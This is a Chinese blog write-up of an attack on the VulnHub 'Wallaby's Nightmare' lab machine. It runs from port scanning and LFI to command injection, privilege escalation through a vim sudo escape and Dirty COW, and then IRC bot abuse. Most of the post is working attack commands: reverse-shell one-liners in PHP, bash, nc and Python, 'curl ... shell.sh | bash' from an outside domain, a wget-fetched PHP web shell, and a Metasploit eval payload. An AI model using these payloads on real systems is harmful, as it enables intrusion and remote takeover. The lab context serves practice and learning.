



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="X_T" href="https://n1h1l157.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="X_T" href="https://n1h1l157.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="X_T" href="https://n1h1l157.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="VULNHUB 1-10" />


<link rel="canonical" href="https://n1h1l157.github.io/2021/11/01/VULNHUB/109%20WALLABY/">



  <title>
VULNHUB 9 WALLABY - VULNHUB |
Phut Hon = X_T = 天行健，君子以自强不息</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">VULNHUB 9 WALLABY
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-11-01 00:00:00">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-11-01T00:00:00+08:00">2021-11-01</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>7.9k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>13 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Phut Hon</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/I2FJTgzYkwqh7rd.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/NCQdhk8r9ybMEzq.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/ukLG5BwF6jH1ONA.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/wg9Jirc8VSKP2ly.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/dYJgbjGQz2NMwDR.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/eZcPaFH4pt9Cx8k.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/VULNHUB/" itemprop="item" rel="index" title="分类于 VULNHUB"><span itemprop="name">VULNHUB</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://n1h1l157.github.io/2021/11/01/VULNHUB/109%20WALLABY/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content=".N1h1l157">
    <meta itemprop="description" content="天行健，君子以自强不息, 人生如逆旅，我亦是行人">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="X_T">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>靶机下载地址：<span class="exturl" data-url="aHR0cHM6Ly93d3cudnVsbmh1Yi5jb20vZW50cnkvd2FsbGFieXMtbmlnaHRtYXJlLXYxMDIsMTc2Lw==">https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/</span><br>
 教程链接地址：<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM0ODAxNzQ1L2FydGljbGUvZGV0YWlscy8xMDQwOTUwMjk=">https://blog.csdn.net/qq_34801745/article/details/104095029</span></p>
<h3 id="确认攻击目标"><a class="markdownIt-Anchor" href="#确认攻击目标">#</a> 确认攻击目标</h3>
<p>攻击机 KALI： 192.168.31.135<br>
 靶机 WALLABY：桥接于 192.168.31.1 的网卡，ip 未知</p>
<ol>
<li>
<p>通过 netdiscover 扫描当前网卡里边有哪些机器<br>
 <code>sudo netdiscover -i eth0 -r 192.168.31.0/24</code></p>
</li>
<li>
<p>将所有已知的 ip 暂时存档，对这类 ip 地址不做端口扫描</p>
</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">shell</span></span><br><span class="line">cat &gt; myip.txt &lt;&lt; EOF</span><br><span class="line">192.168.31.1 192.168.31.25 192.168.31.58 192.168.31.86 192.168.31.33</span><br><span class="line">192.168.31.120 192.168.31.135 192.168.31.145 192.168.31.162 192.168.31.44</span><br><span class="line">EOF</span><br></pre></td></tr></table></figure>
<ol start="3">
<li>去除一些已知 ip 的机器，对剩余 IP 进行端口扫描，判断目标 IP<br>
 <code>sudo nmap -PA 192.168.31.107 --excludefile myip.txt</code></li>
</ol>
<img data-src="/N1h1l157/VULNHUB/image-150.png" width="550" alt="Image">
<p>-&gt; 目标机器的 ip 地址： 192.168.31.5</p>
<ol start="4">
<li>确认靶机 ip 开放的端口信息</li>
</ol>
<p><code>sudo nmap -A -p- 192.168.31.15 -oN /tmp/wallaby.txt</code></p>
<img data-src="/N1h1l157/VULNHUB/image-151.png" width="460" alt="Image">
<p>-&gt; 靶机开放端口 22, 80, 6667</p>
<h3 id="lfi-漏洞测试"><a class="markdownIt-Anchor" href="#lfi-漏洞测试">#</a> LFI 漏洞测试</h3>
<ol>
<li>打开 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNS8=">http://192.168.31.5/</span> 进行信息收集</li>
</ol>
<img data-src="/N1h1l157/VULNHUB/image-152.png" width="390" alt="Image">
<p>输入名字并登陆此网站</p>
<img data-src="/N1h1l157/VULNHUB/image-153.png" width="390" alt="Image">
<p>观察 url 地址，发现存在 lfi 本地文件包含漏洞</p>
<p><img data-src="/N1h1l157/VULNHUB/image-154.png" alt></p>
<p>直接构造 http://192.168.31.5/?page=/etc/passwd</p>
<p><img data-src="/N1h1l157/VULNHUB/image-155.png" alt></p>
<p>访问 http://192.168.31.5/?page=/etc/sudoers 发现对方管理员检测到了 lfi 攻击</p>
<img data-src="/N1h1l157/VULNHUB/image-156.png" width="520" alt="Image">
<p>重新访问 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNS8=">http://192.168.31.5/</span> 发现网站已经挂掉了</p>
<img data-src="/N1h1l157/VULNHUB/image-157.png" width="520" alt="Image">
<p>-&gt; 80 端口被关闭，网站已被注销，重新尝试端口扫描</p>
<h3 id="60080-网站信息收集"><a class="markdownIt-Anchor" href="#60080-网站信息收集">#</a> 60080 网站信息收集</h3>
<p>重新扫描端口，发现 80 被关闭，新开了一个 60080 端口网站<br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC8="> http://192.168.31.5:60080/</span> 渗透测试</p>
<img data-src="/N1h1l157/VULNHUB/image-158.png" width="440" alt="Image">
<p>发现此端口确实存在网站，目标转为对此网站的分析</p>
<p><img data-src="/N1h1l157/VULNHUB/image-159.png" alt></p>
<p>目录爆破，收集更多的目录信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http://192.168.31.5:60080/</span><br><span class="line">gobuster dir -u http://192.168.31.5:60080/ - w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-160.png" width="580" alt="Image">
<p>并没有发现任何有价值的信息</p>
<h3 id="dirb-目录扫描"><a class="markdownIt-Anchor" href="#dirb-目录扫描">#</a> dirb 目录扫描</h3>
<p>仔细回想之前的操作，在 80 端口对网站渗透时，发现了 lfi 漏洞<br>
是在 http://192.168.31.5/?page=home 上的，尝试访问 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC8/cGFnZT1ob21l">http://192.168.31.5:60080/?page=home</span> 仍存在 lfi 漏洞</p>
<p><img data-src="/N1h1l157/VULNHUB/image-161.png" alt></p>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC8/cGFnZT0vZXRjL3N1ZG9lcnM=">http://192.168.31.5:60080/?page=/etc/sudoers</span></p>
<img data-src="/N1h1l157/VULNHUB/image-162.png" width="500" alt="Image">
<p>使用 dirb 对 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC8/cGFnZT0=">http://192.168.31.5:60080/?page=</span> 目录进行扫描</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">dirb是一个基于字典的web目录扫描工具，查找现有的（和/或隐藏的）Web对象，通过对Web服务器发起基于字典的攻击并分析响应的数据。</span></span><br><span class="line">dirb http://192.168.31.5:60080/index.php?page=</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-163.png" width="570" alt="Image">
<p>-&gt; 敏感网址：<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXI=">http://192.168.31.5:60080/index.php?page=mailer</span></p>
<p>将这些文件访问了一遍之后，发现此网站是唯一可能存在漏洞的目标</p>
<img data-src="/N1h1l157/VULNHUB/image-164.png" width="520" alt="Image">
<p>检查源代码，发现这里有一个 rce 漏洞</p>
<p><img data-src="/N1h1l157/VULNHUB/image-165.png" alt></p>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9bWFpbA==">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=mail</span><br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9bHM=">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=ls</span></p>
<img data-src="/N1h1l157/VULNHUB/image-166.png" width="520" alt="Image">
<h3 id="phpcurlbashnc-反弹"><a class="markdownIt-Anchor" href="#phpcurlbashnc-反弹">#</a> php/curl/bash/nc 反弹</h3>
<p>判断目标服务器上是否存在相关的命令<br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9d2hpY2glMjBjdXJs"> http://192.168.31.5:60080/index.php?page=mailer&amp;mail=which%20curl</span><br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9d2hpY2glMjBweXRob24=">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=which%20python</span><br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9d2hpY2glMjBwaHA=">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=which%20php</span><br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9d2hpY2glMjBuYw==">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=which%20nc</span></p>
<p>也可以直接一句话判断所有的信息：<br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuNTo2MDA4MC9pbmRleC5waHA/cGFnZT1tYWlsZXImYW1wO21haWw9d2hpY2glMjBjdXJsO3doaWNoJTIwcGhwO3doaWNoJTIwcHl0aG9uO3doaWNoJTIwYmFzaDs=">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=which curl;which php;which python;which bash;</span></p>
<img data-src="/N1h1l157/VULNHUB/image-167.png" width="560" alt="Image">
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">根据收集到的服务器上的信息进行反弹shell</span></span><br><span class="line">php -r &#x27;$sock=fsockopen(&quot;192.168.31.135&quot;,4444);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#x27;</span><br><span class="line">curl http://www.chentuo.asia/shell.sh | bash (success)</span><br><span class="line">bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.31.135/4444 0&gt;&amp;1&#x27;</span><br><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.31.135/4445 0&gt;&amp;1</span><br><span class="line">nc 192.168.31.135 4444 -e /bin/bash</span><br></pre></td></tr></table></figure>
<p><img data-src="/N1h1l157/VULNHUB/image-168.png" alt></p>
<h3 id="kali-php木马反弹"><a class="markdownIt-Anchor" href="#kali-php木马反弹">#</a> kali php 木马反弹</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cp /usr/share/webshells/php/php-reverse-shell.php shell.php</span><br><span class="line">vim shell.php 将默认端口改为kali的ip和端口号</span><br><span class="line">python 3 -m http.server 80</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">构造如下url执行php</span></span><br><span class="line">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=wget%20http://192.168.31.135/shell.php;%20chmod%20777%20shell.php;%20ls%20-al</span><br></pre></td></tr></table></figure>
<p><img data-src="/N1h1l157/VULNHUB/image-169.png" alt></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">也可以将shell.php发送到有公网ip的网站上让目标机器去访问远程url地址上的payload并反弹shell</span></span><br><span class="line">scp -P 2121 shell.php root@1.117.52.219:/data/wwwroot/www.chentuo.asia/shell.php</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">构造如下url执行php</span></span><br><span class="line">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=wget%20http://www.chentuo.asia/shell.php;%20chmod%20777%20shell.php;%20ls%20-al</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>上述的方法下载下来的 shell.php 是空文件，默认不允许下载此类文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">在服务器上操作 <span class="built_in">cp</span> shell.php shell.txt,下载后重命名即可,构造如下url执行php</span></span><br><span class="line">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=wget%20http://www.chentuo.asia/shell.txt;mv%20shell.txt%20shell.php%20chmod%20777%20shell.php;%20ls%20-al</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">监听本地的 4444 端口，并且同时运行此shell.php文件</span></span><br><span class="line">[http://192.168.31.5:60080/shell.php](http://192.168.31.5:60080/shell.php)</span><br></pre></td></tr></table></figure>
<p><img data-src="/N1h1l157/VULNHUB/image-170.png" alt></p>
<h3 id="python反弹shell"><a class="markdownIt-Anchor" href="#python反弹shell">#</a> python 反弹 shell</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">python 反弹shell代码</span></span><br><span class="line">python -c &#x27;import socket,subprocess,os;</span><br><span class="line">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.31.135 &quot;,4444));</span><br><span class="line">os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);</span><br><span class="line">os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;]);&#x27;</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">构造地址</span></span><br><span class="line">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=python%20-c%20%27import%20socket,subprocess,os;%20s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.31.135%22,4444));%20os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27</span><br></pre></td></tr></table></figure>
<p>如果页面有 html 限制，在审查元素中修改即可</p>
<p><img data-src="/N1h1l157/VULNHUB/image-171.png" alt></p>
<h3 id="msf生成php反弹"><a class="markdownIt-Anchor" href="#msf生成php反弹">#</a> msf 生成 php 反弹</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">msf生成php木马</span></span><br><span class="line">use exploit/multi/script/web_delivery</span><br><span class="line">set target 1</span><br><span class="line">set payload php/meterpreter/reverse_tcp</span><br><span class="line">set lhost 192.168.31.135</span><br><span class="line">set lport 4444</span><br><span class="line">run</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">将msf生成的php反弹shell的代码直接粘贴在url地址上即可</span></span><br><span class="line">http://192.168.31.5:60080/index.php?page=mailer&amp;mail=php%20-d%20allow_url_fopen=true%20-</span><br><span class="line"><span class="meta prompt_">r%</span><span class="language-bash">20%22eval(file_get_contents(%27http://192.168.31.135:8080/Dk00YRQ%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22</span></span><br></pre></td></tr></table></figure>
<p>在此阶段，不要退出 msf，只要 msf 在线，生成的 php 代码运行之后，msf 就会接收到 sessions</p>
<img data-src="/N1h1l157/VULNHUB/image-172.png" width="620" alt="Image">
<h3 id="stty-异常处理"><a class="markdownIt-Anchor" href="#stty-异常处理">#</a> stty 异常处理</h3>
<p>注意使用 msf 的时候如果也用了 stty 会出现下面这个问题</p>
<p><img data-src="/N1h1l157/VULNHUB/image-173.png" alt></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">即enter键被转化为了^M 此时再输入任何命令都无法执行了</span><br><span class="line">哪怕重启msf也无效，这里需要先退出msf，并执行stty sane，可将问题解决</span><br><span class="line">命令sane最常出现在大多数终端的stty选项的集合中，它并不改变通信信道</span><br><span class="line">的速率，但当终端发生混乱时，通常能够产生有益的效果。</span><br></pre></td></tr></table></figure>
<h3 id="权限移到另一shell"><a class="markdownIt-Anchor" href="#权限移到另一shell">#</a> 权限移到另一 shell</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">当前终端：</span></span><br><span class="line">python3 -c &quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;)&quot;</span><br><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.31.135/4445 0&gt;&amp;1</span><br><span class="line">nc - lvvp 4445</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">新的终端：</span></span><br><span class="line">python3 -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br><span class="line">stty raw -echo;fg</span><br><span class="line">export TERM=xterm</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-174.png" width="520" alt="Image">
<h3 id="sudovim提权"><a class="markdownIt-Anchor" href="#sudovim提权">#</a> sudo (vim) 提权</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo -l 发现使用waldo执行vim可以免密</span><br><span class="line">sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf</span><br><span class="line">esc --&gt; :!/bin/bash</span><br><span class="line">esc --&gt; :!bash -i &gt;&amp; /dev/tcp/192.168.31.135/4447 0&gt;&amp;1 可拿到反弹shell</span><br></pre></td></tr></table></figure>
<p><img data-src="/N1h1l157/VULNHUB/image-175.png" alt></p>
<img data-src="/N1h1l157/VULNHUB/image-176.png" width="520" alt="Image">
<h3 id="脏牛提权"><a class="markdownIt-Anchor" href="#脏牛提权">#</a> 脏牛提权</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wget https://github.com/firefart/dirtycow/archive/refs/heads/master.zip</span><br><span class="line">scp -r parallels@192.168.31.135:~/Desktop/tool/dirtycow/dirtycow-master /tmp</span><br><span class="line">cd dirtycow-master</span><br><span class="line">gcc -pthread dirty.c -o dirty -lcrypt</span><br><span class="line">./dirty</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-177.png" width="570" alt="Image">
服务器崩溃，提权失败，需要重启服务器
<h3 id="issri-攻击-irc"><a class="markdownIt-Anchor" href="#issri-攻击-irc">#</a> issri 攻击 irc</h3>
<ol>
<li>修改防火墙规则，允许链接 irc<br>
 在 www-data 用户的时候，发现可以直接调用 root 改变 iptables</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看当前的防火墙规则</span></span><br><span class="line">sudo iptables -L</span><br><span class="line"></span><br><span class="line">同由于它是一个易受攻击的机器，我们看到我们从外部发送到irc的包通过使,用授予所有用户的管理 iptables 的权限被丢弃，我们删除了这个丢弃规则。</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">重写第二条规则以允许端口 6667 上的 TCP 连接</span></span><br><span class="line">sudo iptables -R INPUT 2 -p tcp --dport 6667 -j ACCEPT</span><br><span class="line">sudo iptables -L</span><br><span class="line"></span><br><span class="line">而在nmap扫描端口时也出现了 6667 irc服务</span><br><span class="line">改变iptables之后我们可以通过irssi连接到irc</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-178.png" width="570" alt="Image">
<ol start="2">
<li>
<p>issri 连接至 irc<br>
 <code>irssi -c 192.168.31.5 -p 6667 列出频道 /list</code> <br>
<img data-src="/N1h1l157/VULNHUB/image-179.png" width="520" alt="Image"></p>
</li>
<li>
<p>加入了 wallabyschat 频道 /join #wallabyschat<br>
<img data-src="/N1h1l157/VULNHUB/image-180.png" alt></p>
</li>
<li>
<p>列出选项 .help<br>
<img data-src="/N1h1l157/VULNHUB/image-181.png" alt></p>
</li>
<li>
<p>查看私密信息 /window 3<br>
<img data-src="/N1h1l157/VULNHUB/image-182.png" alt></p>
</li>
<li>
<p>看到 run 似乎有用，返回 /window 2, 执行 run<br>
<img data-src="/N1h1l157/VULNHUB/image-183.png" alt></p>
</li>
</ol>
<p>只有 waldo 才能执行，我们换名字 /nick waldo<br>
 此时更名不成功，因为正有 waldo 用户的进程 tmux 使用着</p>
<ol start="7">
<li>伪造身份登陆 irssi</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">通过sudo -l中的vim权限设置错误提升权限</span><br><span class="line">sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf</span><br><span class="line">esc --&gt; :!/bin/bash 提权至waldo权限</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-184.png" width="470" alt="Image">
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">这里有一个irssi.sh的文件，会以waldo的身份运行shell</span><br><span class="line">他的设置有问题。如果 Tmux 宕机，他的 IRC 连接也会宕机。</span><br><span class="line">pkill tmux</span><br><span class="line">who</span><br></pre></td></tr></table></figure>
<img data-src="/N1h1l157/VULNHUB/image-185.png" width="470" alt="Image">
<ol start="8">
<li>
<p>在 irssi 中修改别名为 waldo：/nick waldo<br>
<img data-src="/N1h1l157/VULNHUB/image-186.png" width="520" alt="Image"></p>
</li>
<li>
<p>现在我们用 waldo 身份来运行 run 看会有什么效果<br>
<img data-src="/N1h1l157/VULNHUB/image-187.png" alt></p>
</li>
</ol>
<h3 id="suid-python提权"><a class="markdownIt-Anchor" href="#suid-python提权">#</a> SUID python 提权</h3>
<p>可以看到的是，我们用 run 执行命令的时候调用的是 wallabyshot 的身份<br>
我们可以构造 payload 尝试将 wallabyshot 身份的 shell 反弹出来</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">这是一个python反弹shell的代码，尝试运行</span></span><br><span class="line">.run python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.31.135 &quot;,4448));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;]);&#x27;</span><br></pre></td></tr></table></figure>
<p><img data-src="/N1h1l157/VULNHUB/image-188.png" alt></p>
<p>作为 waldo，我运行 .run 并从机器人收到 FileNotFound 错误。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FileNotFoundError: [Errno 2] No such file or directory: &#x27;None&#x27; (file &quot;/usr/lib/python3.5/subprocess.py&quot;, line 1551, in _execute_child)</span><br></pre></td></tr></table></figure>
